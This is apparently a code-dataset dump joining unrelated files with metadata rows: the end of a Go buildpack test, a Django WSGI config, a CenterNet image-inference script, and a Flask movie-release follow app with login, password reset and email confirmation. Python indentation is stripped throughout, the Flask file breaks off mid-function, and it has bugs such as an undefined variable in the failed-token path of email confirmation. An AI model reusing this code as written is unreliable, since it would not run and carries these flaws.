It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
Context("The language matches", func() {
Context("The version matches", func() {
BeforeEach(func() {
metadata := "---\nlanguage: dotnet-core\nversion: 99.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
Context("The version does not match", func() {
BeforeEach(func() {
metadata := "---\nlanguage: dotnet-core\nversion: 33.99"
ioutil.WriteFile(filepath.Join(cacheDir, "BUILDPACK_METADATA"), []byte(metadata), 0666)
})
It("Logs a warning that the buildpack version has changed", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(ContainSubstring("buildpack version changed from 33.99 to 99.99"))
})
})
})
})
Context("BUILDPACK_METADATA does not exist", func() {
It("Does not log anything", func() {
manifest.CheckBuildpackVersion(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
})
Describe("StoreBuildpackMetadata", func() {
var cacheDir string
BeforeEach(func() {
cacheDir, err = ioutil.TempDir("", "cache")
})
AfterEach(func() {
err = os.RemoveAll(cacheDir)
Expect(err).To(BeNil())
})
Context("VERSION file exists", func() {
Context("cache dir exists", func() {
It("writes to the BUILDPACK_METADATA file", func() {
manifest.StoreBuildpackMetadata(cacheDir)
var md libbuildpack.BuildpackMetadata
y := &libbuildpack.YAML{}
err = y.Load(filepath.Join(cacheDir, "BUILDPACK_METADATA"), &md)
Expect(err).To(BeNil())
Expect(md.Language).To(Equal("dotnet-core"))
Expect(md.Version).To(Equal("99.99"))
})
})
Context("cache dir does not exist", func() {
It("Does not log anything", func() {
manifest.StoreBuildpackMetadata(filepath.Join(cacheDir, "not_exist"))
Expect(buffer.String()).To(Equal(""))
Expect(filepath.Join(cacheDir, "not_exist")).ToNot(BeADirectory())
})
})
})
Context("VERSION file does not exist", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
})
It("Does not log anything", func() {
manifest.StoreBuildpackMetadata(cacheDir)
Expect(buffer.String()).To(Equal(""))
})
})
})
})
|
[
"\"CF_STACK\""
] |
[] |
[
"CF_STACK"
] |
[]
|
["CF_STACK"]
|
go
| 1 | 0 | |
MrsKsMathCram/MrsKsMathCram/wsgi.py
|
"""
WSGI config for MrsKsMathCram project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MrsKsMathCram.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
inference.py
|
from generators.csv_ import CSVGenerator
from models.resnet import centernet
import cv2
import os
import numpy as np
import time
from generators.utils import affine_transform, get_affine_transform
from utils.image import read_image_bgr, preprocess_image, resize_image
import os.path as osp
DATA_SUFFIX = '_datamap.png'
RESULT_PATH = "result/"
PROCESS_PATH = "process/"
model_path = 'checkpoints/csv.h5'
colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255)]
score_threshold = 0.5
flip_test = False
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
generator = CSVGenerator(
'data/annotations.csv',
'data/classes.csv',
'data',
)
num_classes = generator.num_classes()
classes = list(generator.classes.keys())
model, prediction_model, debug_model = centernet(num_classes=num_classes,
nms=True,
flip_test=flip_test,
freeze_bn=False,
score_threshold=score_threshold)
prediction_model.load_weights(model_path, by_name=True, skip_mismatch=True)
for f in os.listdir(PROCESS_PATH):
if f.endswith(DATA_SUFFIX):
image = read_image_bgr(PROCESS_PATH + f)
src_image = image.copy()
c = np.array([image.shape[1] / 2., image.shape[0] / 2.], dtype=np.float32)
s = max(image.shape[0], image.shape[1]) * 1.0
tgt_w = generator.input_size
tgt_h = generator.input_size
trans_input = get_affine_transform(c, s, (tgt_w, tgt_h))
image = cv2.warpAffine(image, trans_input, (tgt_w, tgt_h), flags=cv2.INTER_LINEAR)
image = image.astype(np.float32)
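# Subtract the Caffe-style ImageNet channel means (BGR order) expected by the backbone's preprocessing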
image[..., 0] -= 103.939
image[..., 1] -= 116.779
image[..., 2] -= 123.68
print(image.shape)
if flip_test:
flipped_image = image[:, ::-1]
inputs = np.stack([image, flipped_image], axis=0)
else:
inputs = np.expand_dims(image, axis=0)
# run network
start = time.time()
detections = prediction_model.predict_on_batch(inputs)[0]
print(time.time() - start)
scores = detections[:, 4]
# select indices which have a score above the threshold
indices = np.where(scores > score_threshold)[0]
# select those detections
detections = detections[indices]
detections_copy = detections.copy()
detections = detections.astype(np.float64)
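# Map the boxes from the network's 1/4-resolution output grid back to the
# original image coordinates using the inverse affine transform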
trans = get_affine_transform(c, s, (tgt_w // 4, tgt_h // 4), inv=1)
for j in range(detections.shape[0]):
detections[j, 0:2] = affine_transform(detections[j, 0:2], trans)
detections[j, 2:4] = affine_transform(detections[j, 2:4], trans)
detections[:, [0, 2]] = np.clip(detections[:, [0, 2]], 0, src_image.shape[1])
detections[:, [1, 3]] = np.clip(detections[:, [1, 3]], 0, src_image.shape[0])
with open(RESULT_PATH + f[:-len(DATA_SUFFIX)] + '.txt', 'w') as output:
for detection in detections:
xmin = int(round(detection[0]))
ymin = int(round(detection[1]))
xmax = int(round(detection[2]))
ymax = int(round(detection[3]))
score = '{:.4f}'.format(detection[4])
class_id = int(detection[5])
print(f'{xmin},{ymin},{xmax},{ymax},{class_id}', file=output)
color = colors[class_id]
class_name = classes[class_id]
label = '-'.join([class_name, score])
ret, baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 1.5, 1)
cv2.rectangle(src_image, (xmin, ymin), (xmax, ymax), color, 4)
cv2.rectangle(src_image, (xmin, ymax - ret[1] - baseline), (xmin + ret[0], ymax), color, -1)
cv2.putText(src_image, label, (xmin, ymax - baseline), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (0, 0, 0), 2)
cv2.imwrite(RESULT_PATH + f[:-len(DATA_SUFFIX)] + '_result.png', src_image)
#cv2.namedWindow('image', cv2.WINDOW_NORMAL)
#cv2.imshow('image', src_image)
#key = cv2.waitKey(0)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
app.py
|
import os
import configuration
import re
import requests
import math
from datetime import date
from dateutil.relativedelta import relativedelta
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import flash, g, redirect, render_template, request, url_for, session
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from werkzeug.security import generate_password_hash, check_password_hash
from api import multiSearch, lookupById, lookupTvById, lookupReleaseDate, lookupReleaseDatee, lookupRelatedTv, lookupRelatedMovies, lookupUpcoming, lookupPopular, lookupRecent, lookupPersonMovies, lookupPersonProfile, lookupGenre, lookupTvGenre
from utilities import login_required, check_confirmed, generate_confirmation_token, confirm_token, get_locale
from emailer import send_release_mail, send_reset_mail, send_confirmation_email
from datetime import datetime
# define our flask app
app = Flask(__name__)
# setting up config
app.config.update(
SECRET_KEY = configuration.SECRET_KEY_STORAGE,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Lax'
)
# used to switch DB
ENV = 'launch'
if ENV == 'dev':
app.config['SQLALCHEMY_DATABASE_URI'] = configuration.DATABASE_URL
else:
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL')
# gets rid of annoying error message
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# init db
db = SQLAlchemy(app)
# our database models
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(50), unique=True)
password = db.Column(db.String(255))
confirmed = db.Column(db.Boolean, default=False)
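# Issue a signed, time-limited token embedding this user's id (used for password resets)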
def get_reset_token(self, expires_sec=1800):
s = Serializer(app.config['SECRET_KEY'], expires_sec)
return s.dumps({'user_id': self.id}).decode('utf8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return User.query.get(user_id)
def __init__(self, username, password, confirmed):
self.username = username
self.password = password
self.confirmed = confirmed
class Follows(db.Model):
__tablename__ = 'follows'
follow_id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer)
movie_id = db.Column(db.Integer)
movie_title = db.Column(db.String)
movie_date = db.Column(db.Text())
movie_type = db.Column(db.String)
def __init__(self, user_id, movie_id, movie_title, movie_date, movie_type):
self.user_id = user_id
self.movie_id = movie_id
self.movie_title = movie_title
self.movie_date = movie_date
self.movie_type = movie_type
# main page route
@app.route('/', methods=('GET', 'POST'))
def index():
# acquire the movie title from form and pass it to the results page
if request.method == 'POST':
query = request.form['movie_title']
# parse input to make sure it's not empty and that the search will return some results
if query == '':
error = 'Please provide a movie title'
# parse input to make sure it has some results
elif multiSearch(query) == []:
error = 'Please refine your search query to be more specific'
# if valid and results are found - redirect to results page - passing the query
else:
# New multisearch function implementation
return redirect(url_for('results', query=query))
flash(error, 'warning')
# get request will display index
return render_template('dashboard/index.html', home=True)
# results route - takes one argument which is the query string
@app.route('/results', methods=('GET', 'POST'))
def results():
page_chunk = 2
query = request.args.get('query')
try:
adult = session['adult']
except Exception as e:
adult = 'false'
pass
# New multisearch function implementation
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/search/multi?api_key={configuration.API_KEY_STORAGE}&language=en-US&query={query}&include_adult={adult}®ion=US").json()["total_pages"] / page_chunk)
page = request.args.get('page')
if page is None:
page = 1
else:
page = int(page)
# use our api to get results based on query string
searchQuery = multiSearch(query, page, adult)
# render template with results
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=query)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error:
# flash error message
flash(error, 'warning')
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=query)
# details route to show movie info and imdb link / takes one arguement (id of the movie)
@app.route('/details/<string:mediaType>/<int:id>', methods=('GET', 'POST'))
def details(id, mediaType):
# For TV
if mediaType == 'tv':
movie = lookupTvById(id)
related = lookupRelatedTv(id)
release = movie[0]['release_full']
release_year = movie[0]['release_year']
bg = movie[0]['backdrop']
# For Movies
elif mediaType == 'movie':
movie = lookupById(id)
related = lookupRelatedMovies(id)
test_date = lookupReleaseDatee(id)
bg = movie[0]['backdrop']
# if get - then get api information and pass that to the template
if request.method == 'GET':
if mediaType == 'movie':
if movie[0]['release_full'] == 'N/A':
release_year = 'N/A'
release = 'N/A'
else:
if movie[0]['release_obj']['theatre']['full'] != 'TBA':
date_obj = datetime.strptime(movie[0]['release_obj']['theatre']['full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_obj']['theatre']['full']
elif movie[0]['release_obj']['digital']['full'] != 'TBA':
date_obj = datetime.strptime(movie[0]['release_obj']['digital']['full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_obj']['digital']['full']
else:
date_obj = datetime.strptime(movie[0]['release_full'], '%B %d, %Y')
release_year = date_obj.strftime('%Y')
release = movie[0]['release_full']
return render_template('search/details.html', details=movie, release=release, year=release_year, related=related, mediaType=mediaType, bg = bg, title=movie[0]['name'])
# else if they click the follow button
elif request.method == 'POST':
# Adding functionality to follow either theatre / digital release OR both
theatre = request.form.get('theatrical')
digital = request.form.get('digital')
# Insert follow(s) into database
error = insert_follows(id, theatre, digital)
# flash any error message
if error:
flash(error, 'warning')
return redirect(url_for('follows'))
# Upcoming movies
@app.route('/upcoming', methods=('GET', 'POST'))
def upcoming():
# Get three months ahead date - to cap our upcoming end date
three_months_ahead = date.today() + relativedelta(months=+3)
# Set page chunk size which will grab X amount of pages from the API
# And also be used to divide our total page count by to get an accurate page total
page_chunk = 2
# Get today's date for the start date of our query
today = date.today()
# Get sort by preference --- default is popularity descending
sort_by = request.args.get('sort_by') or 'popularity.desc'
# Get the page count of available results from the API and store it in a variable
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=true&include_video=false&primary_release_date.gte={today}&primary_release_date.lte={three_months_ahead}").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page value to 1 or if an argument is passed in - that value
if page is None:
page = 1
else:
page = int(page)
# Query our api
results = lookupUpcoming(page, sort_by)
# render template with results
if request.method == 'GET':
if results == []:
return redirect(url_for('index'))
return render_template('search/upcoming.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/upcoming.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# Upcoming movies
@app.route('/recent', methods=('GET', 'POST'))
def recent():
one_month_behind = date.today() + relativedelta(months=-1)
# Set page chunk size which will grab X amount of pages from the API
# And also be used to divide our total page count by to get an accurate page total
page_chunk = 2
# Get today's date for the start date of our query
today = date.today()
# Get sort by preference --- default is popularity descending
sort_by = request.args.get('sort_by') or 'popularity.desc'
# Get the page count of available results from the API and store it in a variable
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=true&include_video=false&primary_release_date.lte={today}&primary_release_date.gte={one_month_behind}").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page value to 1 or if an argument is passed in - that value
if page is None:
page = 1
else:
page = int(page)
# Query our api
results = lookupRecent(page, sort_by)
# render template with results
if request.method == 'GET':
# In the rare case where the final page of recent results returns an empty list
if results == []:
results = lookupRecent(page - 1, sort_by)
pageCount = pageCount - 1
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page - 1, sort_by=sort_by)
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/recent.html', results=results, pageCount=pageCount, page=page, sort_by=sort_by)
@app.route('/popular', methods=('GET', 'POST'))
def popular():
# Set page chunk value
page_chunk = 2
# Calculate page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/movie/popular?api_key={configuration.API_KEY_STORAGE}&language=en-US®ion=US").json()["total_pages"] / page_chunk)
# Get current page
page = request.args.get('page')
# Set page to 1 or convert page to an int
if page is None:
page = 1
else:
page = int(page)
# Query the api
popularMovies = lookupPopular(page)
# Sort by most popular
def sort(e):
return e['popularity']
popularMovies.sort(reverse=True, key=sort)
# render template with results
if request.method == 'GET':
if popularMovies == []:
return redirect(url_for('index'))
return render_template('search/popular.html', results=popularMovies, page=page, pageCount=pageCount)
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/popular.html', results=popularMovies, page=page, pageCount=pageCount)
@app.route('/people/filmography/<int:id>/<string:name>', methods=('GET', 'POST'))
def peoplemovies(id, name):
# Set page count and page to 1 - only one page is returned
pageCount = 1
page = 1
# use our api to get results based on query string
searchQuery = lookupPersonMovies(id)
# render template with results
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=id, name=name)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/results.html', results=searchQuery, page=page, pageCount=pageCount, query=id, name=name)
@app.route('/genres/<string:mediaType>/<int:genre>/<genrename>', methods=('GET', 'POST'))
def genres(mediaType, genre, genrename):
# Get sort order and current page from req args
sort_by = request.args.get('sort_by') or 'popularity.desc'
page = request.args.get('page')
# three_months_ahead = date.today() + relativedelta(months=+3)
# three_months_behind = date.today() + relativedelta(months=-3)
# If no page provided - page is 1
if page is None:
page = 1
# Else - convert the page into an integer
else:
page = int(page)
# Set our page chunk count which grabs X amount of pages from the api
page_chunk = 2
# For movies
if mediaType == 'movie':
# Get page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/movie?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=false&include_video=false&with_genres={genre}").json()["total_pages"] / page_chunk)
# Query the api
searchQuery = lookupGenre('movie', genre, page, sort_by)
# For TV
elif mediaType == 'tv':
# Get the page count
pageCount = math.ceil(requests.get(
f"https://api.themoviedb.org/3/discover/tv?api_key={configuration.API_KEY_STORAGE}&language=en-US&sort_by={sort_by}&include_adult=false&include_video=false&with_genres={genre}").json()["total_pages"] / page_chunk)
# Query the api
searchQuery = lookupGenre('tv', genre, page, sort_by)
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/genres.html', results=searchQuery, page=page, pageCount=pageCount, genre=genre, genrename=genrename, mediaType=mediaType, sort_by=sort_by)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/genres.html', results=searchQuery, page=page, pageCount=pageCount, genre=genre, genrename=genrename, mediaType=mediaType)
@app.route('/profile/<int:id>', methods=('GET', 'POST'))
def profile(id):
# Get movies 'person' has been in
movies = lookupPersonMovies(id)
# Get profile object
profile = lookupPersonProfile(id)
# if get - then get api information and pass that to the template
if request.method == 'GET':
return render_template('search/profile.html', profile=profile, movies=movies, name=profile[0]['name'])
# This link is visited daily to make sure release dates are accurate
# And to send emails to users when movies are released
@ app.route('/schedule')
def schedule():
if request.method == 'GET':
update_release_dates()
check_db()
return render_template('search/schedule.html')
# Register route
@ app.route('/auth/register', methods=('GET', 'POST'))
def register():
# on post - retrieve info from our form
if request.method == 'POST':
username = request.form['username'].lower()
password = request.form['password']
confirm = request.form['confirm']
# pre-set error to None
error = None
# init regex
reg = "^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&-_])[A-Za-z\d@$!#%*?&-_]{6,20}$"
# Compile Regex
pat = re.compile(reg)
# Search Regex
mat = re.search(pat, password)
# parse input
if not username:
error = 'You must provide a username'
elif not password:
error = 'You must provide a password'
# make sure username doesn't already exist
if db.session.query(User).filter(User.username == username).count() > 0:
error = 'User {} is already registered'.format(username)
# make sure passwords match
elif password != confirm:
error = 'Passwords must match'
elif not mat:
error = 'Password must contain (one number / one uppercase / one lowercase / one special symbol (@$!%*#?&-_) / be between 6-20 characters'
# if no errors then insert user into database
if error is None:
# Create user object
insert_user = User(username, generate_password_hash(password), confirmed=False)
# Push it to the database
db.session.add(insert_user)
db.session.commit()
# Create a confirmation token
token = generate_confirmation_token(username)
# Create a confirmation url with that token
confirm_url = url_for('confirm_email', token=token, _external=True)
# Send the confirmation email
try:
send_confirmation_email(username, confirm_url)
except:
return redirect(url_for('error_404', error='SMTP Error. Please email [email protected].'))
# flash success message
# Create session
user = User.query.filter_by(username=username).first()
session.clear()
session['user_id'] = user.id
# redirect to home page
flash('Now Registered As: {}! Welcome. Please confirm your email.'.format(username), 'success')
return redirect(url_for('unconfirmed'))
# flash any errors
flash(error, 'warning')
# if get then render template
return render_template('auth/register.html')
# Login route
@ app.route('/auth/login', methods=('POST', 'GET'))
def login():
# If next exists - store it in a variable so the user will be forwarded to the page they were on previously
next = request.args.get('next')
if request.method == 'POST':
# On post - retrieve info from the form
username = request.form['username'].lower()
password = request.form['password']
error = None
# Check for user in database and pull their info if it exists
user = User.query.filter_by(username=username).first()
# If valid input and user exists - set session data
if user and check_password_hash(user.password, password) == True:
session.clear()
session['user_id'] = user.id
# If user has not confirmed their email
if user.confirmed == False:
flash('Please confirm your email', 'warning')
# Redirect to home page
if next == None:
return redirect(url_for('index'))
# Redirect to the movie they were trying to follow
else:
return redirect(url_for('details', id=next, mediaType='movie'))
# parse for errors and set error message accordingly
elif not user or user is None:
error = 'Invalid Username/Password Combination'
elif not username or not password:
error = 'You must fill in both fields'
else:
error = 'Invalid Username/Password Combination'
# flash error if there is one
flash(error, 'warning')
# If logged in
if g.user is not None:
return redirect(url_for('index'))
# Render login page
return render_template('auth/login.html')
# follows route to display users followed movies
@ app.route('/user/follows', methods=('GET', 'POST'))
# ensure user is logged in and that their email is confirmed
@ login_required
@ check_confirmed
def follows():
# grab user's follows from the database and arrange them in order by release date
if request.method == 'GET':
follows = db.session.query(Follows).filter(
Follows.user_id == session['user_id']).order_by(Follows.movie_date.desc()).all()
followList = []
# create a list of all users follows to display in the template
for i in range(len(follows)):
date_obj = datetime.strptime(follows[i].movie_date, '%Y-%m-%d')
release = date_obj.strftime('%B %d, %Y')
released = date_obj.date() <= datetime.now().date()
title = follows[i].movie_title
movie_id = follows[i].movie_id
movie_type = follows[i].movie_type
followList.append({
"name": title,
"id": movie_id,
"release": release,
"released": released,
"movie_type": movie_type
})
# render the template and fill it in with the retrieved info
return render_template('user/follows.html', follows=followList)
# if they choose to delete a follow - delete it from their follows
elif request.method == 'POST':
# get the movie id from the form (delete button value)
id = request.form['movie_id']
movie_type = request.form.get('movie_type')
# store their session id
user = g.user.id
# deletion query
delete_this = db.session.query(Follows).filter(
Follows.movie_id == id,
Follows.user_id == user,
Follows.movie_type == movie_type
).one()
# delete the entry and commit it
db.session.delete(delete_this)
db.session.commit()
# create an updated follows list
follows = db.session.query(Follows).filter(
Follows.user_id == session['user_id']).order_by(Follows.movie_date.desc()).all()
followList = []
for i in range(len(follows)):
date_obj = datetime.strptime(follows[i].movie_date, '%Y-%m-%d')
release = date_obj.strftime('%B %d, %Y')
released = date_obj.date() <= datetime.now().date()
title = follows[i].movie_title
movie_id = follows[i].movie_id
movie_type = follows[i].movie_type
followList.append({
"name": title,
"id": movie_id,
"release": release,
"released": released,
"movie_type": movie_type
})
# render the updated template after deletion
return render_template('user/follows.html', follows=followList)
# ----------------------- TODO -----------------------
#
@app.route('/user/settings', methods=('GET', 'POST'))
@login_required
def settings():
if request.method == 'GET':
return render_template('user/settings.html')
if request.method == 'POST':
session['adult'] = request.form['adult']
return render_template('user/settings.html')
# this will store the users id in a global variable accessible anywhere
@ app.before_request
def load_logged_in_user():
user_id = session.get('user_id')
if user_id is None:
g.user = None
else:
try:
user = User.query.filter_by(id=user_id).all()
g.user = user[0]
except Exception as e:
return redirect(url_for('error_404', error='Database error, please email admin @ [email protected]'))
# logout route
@ app.route('/logout')
def logout():
g.user = None
session.clear()
return redirect(url_for('index'))
# Function to make sure release dates are accurate
def update_release_dates():
# Get follows list from database
releases = db.session.query(Follows).all()
# Loop over each item
for release in releases:
# Store the movie's id
database_id = release.movie_id
# Store the current release date we have in the database
database_date = release.movie_date
# Get the updated release date information from the API
updated_info = lookupReleaseDate(database_id)
# If the database is different than the API data and not 'TBA'
if database_date != updated_info['digital']['small'] and updated_info['digital']['small'] != 'TBA':
# If the database date is also different than the theatre date
if database_date != updated_info['theatre']['small'] and updated_info['theatre']['small'] != 'TBA':
# Update the release date to the theatre date
release.movie_date = updated_info['theatre']['small']
# If the database date is not different than the theatre date or the theatre date is TBA
elif updated_info['digital']['small'] != 'TBA':
# Update the release date to the digital date
release.movie_date = updated_info['digital']['small']
# If the database date is the same as the digital date BUT different than the theatre date
elif database_date != updated_info['theatre']['small'] and updated_info['theatre']['small'] != 'TBA':
# Update the release date to the theatre date
release.movie_date = updated_info['theatre']['small']
db.session.commit()
# function to go over database and find any movie that releases on 'todays' date
def check_db():
# store todays date value
today = str(datetime.now().date())
# grab all releases from follows table that have a movie_date value that matches todays date
releases = db.session.query(Follows).filter(
Follows.movie_date == today).all()
# if none found do nothing
if releases is None or releases == []:
pass
# else send emails to users following a movie that releases today
else:
for release in releases:
# date format
date_obj = datetime.strptime(release.movie_date, '%Y-%m-%d')
release_date = date_obj.strftime('%B %d, %Y')
# get the users email for each release
to_email = User.query.filter_by(
id=release.user_id).first().username
# as well as the movie title
movie_title = release.movie_title
# Get the poster for the movie
movie = lookupById(release.movie_id)
movie_poster = movie[0]['cover']
# Get the first two cast members to put in the email
if type(movie[0]['cast']) is list:
movie_stars = movie[0]['cast'][0:2]
else:
movie_stars = 'Unknown'
if movie_poster != 'https://image.tmdb.org/t/p/w600_and_h900_bestv2None':
movie_poster_url = movie_poster
else:
movie_poster_url = 'http://www.riobeauty.co.uk/images/product_image_not_found.gif'
# send the email
try:
send_release_mail(to_email, release_date, movie_title, movie_poster_url, movie_stars)
# if a failure occurs - print an error
except:
print('Email Error')
# Forgot password route
@ app.route('/auth/forgot', methods=('GET', 'POST'))
def forgot():
if request.method == 'GET':
return render_template('auth/forgot.html')
if request.method == 'POST':
# Get username input
username = request.form['username'].lower()
# Query the database with said username
user = db.session.query(User).filter(User.username == username).first()
# If no matches found
if user is None:
error = 'User {} does not exist.'.format(username)
else:
# Create reset link
token = user.get_reset_token()
link = url_for('reset', token=token, _external=True)
# Try sending the reset email
try:
send_reset_mail(username, link)
flash('An email has been sent with instructions to reset your password.', 'success')
except Exception as e:
# Error redirect
return redirect(url_for('error_404', error=e))
return redirect(url_for('login'))
# Flash the error if there is one
flash(error, 'warning')
return render_template('auth/forgot.html')
@ app.route('/auth/reset/<token>', methods=('GET', 'POST'))
def reset(token):
# Verify the token
user = User.verify_reset_token(token)
if request.method == 'GET':
if user is None:
flash('That is an invalid or expired token', 'danger')
return redirect(url_for('forgot'))
else:
return render_template('auth/reset.html')
elif request.method == 'POST':
password = request.form['password']
confirm = request.form['confirm']
# pre-set error to None
error = None
# init regex
reg = "^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*#?&-_])[A-Za-z\d@$!#%*?&-_]{6,20}$"
# Compile Regex
pat = re.compile(reg)
# Search Regex
mat = re.search(pat, password)
if not password:
error = 'You must provide a password'
# make sure passwords match
elif password != confirm:
error = 'Passwords must match'
elif not mat:
error = 'Password must contain (one number / one uppercase / one lowercase / one special symbol (@$!%*#?&-_) / be between 6-20 characters'
# if no errors then insert user into database
if error is None:
hashed_password = generate_password_hash(password)
user.password = hashed_password
db.session.commit()
# flash success message
flash('Your Password Has Been Updated! Please Login.', 'success')
return redirect(url_for('login'))
# flash any errors
flash(error, 'warning')
# if get then render template
return render_template('auth/reset.html')
# Confirmation email page
@ app.route('/auth/confirm/<token>')
@ login_required
def confirm_email(token):
try:
email = confirm_token(token)
except:
flash('Confirmation link is invalid or expired.', 'danger')
user = db.session.query(User).filter(User.username == email).first()
if user.confirmed:
flash('Account already confirmed, please login.', 'success')
else:
user.confirmed = True
db.session.commit()
session.clear()
session['user_id'] = user.id
return redirect(url_for('index'))
# Resend confirmation email
@ app.route('/auth/resend')
@ login_required
def resend_confirmation():
token = generate_confirmation_token(g.user.username)
confirm_url = url_for('confirm_email', token=token, _external=True)
try:
send_confirmation_email(g.user.username, confirm_url)
except:
return redirect(url_for('error_404', error='SMTP Error. Please email [email protected].'))
flash('A new confirmation email has been sent.', 'success')
return redirect(url_for('unconfirmed'))
# Unconfirmed email page
@ app.route('/auth/unconfirmed')
@ login_required
def unconfirmed():
if g.user.confirmed:
return redirect(url_for('index'))
return render_template('auth/unconfirmed.html')
# Email confirmation functions
@ app.route('/error/404')
def error_404():
error = request.args.get('error') or None
return render_template('error/404.html', error=error)
def insert_single_follow(movie_id):
movie = lookupById(movie_id)[0]
# set error to none
error = None
# Get release object and store it in a variable
release_obj = movie['release_obj']
# If neither release type is available - fall back to the basic date provided
if release_obj['digital']['small'] == 'TBA' and release_obj['theatre']['small'] == 'TBA':
date = movie['release_small']
movie_type = 'digital'
# If no digital date - follow the theatrical release
elif release_obj['digital']['small'] == 'TBA':
date = release_obj['theatre']['small']
movie_type = 'theatrical'
# If no theatre date - follow the digital release
elif release_obj['theatre']['small'] == 'TBA':
date = release_obj['digital']['small']
movie_type = 'digital'
# If both types are available - follow the digital one
else:
date = release_obj['digital']['small']
movie_type = 'digital'
# check to make sure user is not already following
if db.session.query(Follows).filter(
Follows.user_id == session['user_id'],
Follows.movie_id == movie['id'],
Follows.movie_date == date,
Follows.movie_type == movie_type
).count() > 0:
# set error message appropriately
error = 'You are already following the {} release for {}!'.format(movie_type, movie['name'])
# if not following then insert the follow into the database
else:
insert_follow = Follows(
session['user_id'], movie['id'], movie['name'], date, movie_type)
db.session.add(insert_follow)
db.session.commit()
# flash success message and re-render template
flash('Now following {}!'.format(movie['name']), 'success')
return error
def insert_follows(movie_id, theatre=None, digital=None):
release_date = None
movie_type = None
release_date_list = None
error = None
err_count = 0
# Adding functionality to follow either theatre / digital release OR both
# Lookup movie in database
movie = lookupById(movie_id)[0]
# Get release info based on users input
# For BOTH types of releases
if theatre is not None and digital is not None:
release_obj = lookupReleaseDate(movie_id)
release_date_list = [
{
'type': 'digital',
'date': str(release_obj['digital']['small'])
},
{
'type': 'theatrical',
